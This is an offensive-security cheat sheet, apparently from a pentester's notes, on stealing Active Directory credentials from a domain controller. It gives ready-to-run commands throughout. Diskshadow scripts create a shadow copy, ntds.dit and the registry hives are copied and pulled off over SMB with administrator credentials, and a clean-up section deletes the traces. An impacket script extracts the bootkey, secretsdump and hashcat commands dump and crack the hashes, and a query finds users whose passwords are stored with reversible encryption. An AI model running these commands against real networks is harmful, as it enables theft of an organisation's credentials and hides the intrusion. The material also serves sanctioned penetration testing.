Shadow Disk
Create via Diskshadow
Locate diskshadow.exe
:
Copy cmd /c where /R C:\ diskshadow.exe
Create a shadow disk:
Copy cd \Windows\Temp
powershell -c "Add-Content add_vol.txt 'set context persistent nowriters'"
powershell -c "Add-Content add_vol.txt 'set metadata C:\Windows\Temp\meta.cab'"
powershell -c "Add-Content add_vol.txt 'set verbose on'"
powershell -c "Add-Content add_vol.txt 'begin backup'"
powershell -c "Add-Content add_vol.txt 'add volume c: alias DCROOT'"
powershell -c "Add-Content add_vol.txt 'create'"
powershell -c "Add-Content add_vol.txt 'expose %DCROOT% w:'"
powershell -c "Add-Content add_vol.txt 'end backup'"
cmd /c diskshadow.exe /s add_vol.txt
Copy set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
begin backup
add volume c: alias DCROOT
create
expose %DCROOT% w:
end backup
Exfiltrate over SMB
Create a network share with anonymous access and put there all we need:
Copy cd \Windows\Temp
copy w:\Windows\NTDS\ntds.dit ntds.dit
cmd /c reg.exe save hklm\system system.hive
cmd /c reg.exe save hklm\sam sam.hive
cmd /c reg.exe save hklm\security security.hive
Connect to the share and grab the files:
Copy $ smbclient.py MEGACORP/administrator:'Passw0rd!'@192.168.1.11
use C$
cd windows/temp
get ntds.dit
get system.hive
get sam.hive
get security.hive
Clean Up
Remove the shadow volume:
Copy cd \Windows\Temp
powershell -c "Add-Content delete_vol.txt 'set context persistent nowriters'"
powershell -c "Add-Content delete_vol.txt 'set metadata C:\Windows\Temp\meta.cab'"
powershell -c "Add-Content delete_vol.txt 'set verbose on'"
powershell -c "Add-Content delete_vol.txt 'unexpose w:'"
powershell -c "Add-Content delete_vol.txt 'delete shadows volume c:'"
powershell -c "Add-Content delete_vol.txt 'reset'"
cmd /c diskshadow.exe /s delete_vol.txt
Copy set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
unexpose w:
delete shadows volume c:
reset
Remove the share and all the traces:
Copy cd \Windows\Temp
rm ntds.dit
rm system.hive
rm sam.hive
rm security.hive
rm C:\Windows\Temp\meta.cab
rm add_vol.txt
rm delete_vol.txt
Raw NTDS.dit Copy
Obtain a copy of NTDS.dit:
Copy PS > Invoke-NTFSCopy C:\Windows\NTDS\ntds.dit C:\Windows\Temp\ntds.dit
Parse on-site in conjunction with NtdsAudit :
Copy PS > esentutl.exe /p "C:\Windows\Temp\ntds.dit" /!10240 /8 /o
PS > reg.exe save HKLM\SYSTEM system.hive
PS > .\NtdsAudit.exe ntds.dit -s system.hive -p hashes.txt -u users.csv --dump-reversible cleartext.txt
Parse on-site in conjunction with secretsdump.exe :
Copy from binascii import hexlify
from impacket . smbconnection import SMBConnection
from impacket . examples . secretsdump import RemoteOperations
hostname = 'DC01.megacorp.local'
username = 'snovvcrash'
password = '<PASSWORD>'
nthash = '' if password else '<NTHASH>'
domain = hostname . split ( '.' , 1 ) [ 1 ]
smbConn = SMBConnection (remoteName = hostname, remoteHost = hostname)
smbConn . login (user = username, password = password, domain = domain, nthash = nthash)
remOps = RemoteOperations (smbConnection = smbConn, doKerberos = False )
remOps . enableRegistry ()
bootKey = remOps . getBootKey ()
print ( hexlify (bootKey). decode ())
remOps . finish ()
# .\secretsdump.exe LOCAL -ntds C:\Windows\Temp\ntds.dit -bootkey <BOOTKEY>
Parse NTDS.dit
Parse with secretsdump.py :
Copy $ secretsdump.py [-pwd-last-set] [-user-status] [-history] -sam sam.hive -system system.hive -security security.hive -ntds ntds.dit LOCAL > ntds.txt
$ cat ntds.txt | grep -a aad3b | grep -i 'Status=Enabled' | grep -v 31d6c | grep -v -e '\$' -e '{' -e '}' -e HealthMailbox | awk -F: '{print $1":"$4}' | sort -u > ntds.in
$ hashcat -m 1000 -a 0 -w 3 -O --session=ntds -o ntds.out ntds.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
Parse with aesedb (faster but less informative):
Copy $ antdsparse <BOOTKEY> ntds.dit -o ntds.txt --progress
$ antdsparse system.hive ntds.dit -o ntds.txt --progress
Parse with ntdissector:
Reversible Encryption
Check if enabled globally:
gpmc.msc > Default Domain Policy > Computer Configuration > Policies > Windows Settings > Security Settings > Account Policies > Password Policy > Store passwords using reversible encryption > Enabled ✔
Check if enabled for specific users:
Copy PS > Get-ADUser -Filter {userAccountControl -band 128} -Properties userAccountControl | ft name,samAccountName,userAccountControl | tee users-revenc.txt
When DCSyncing such users, a cleartext password will be obtained.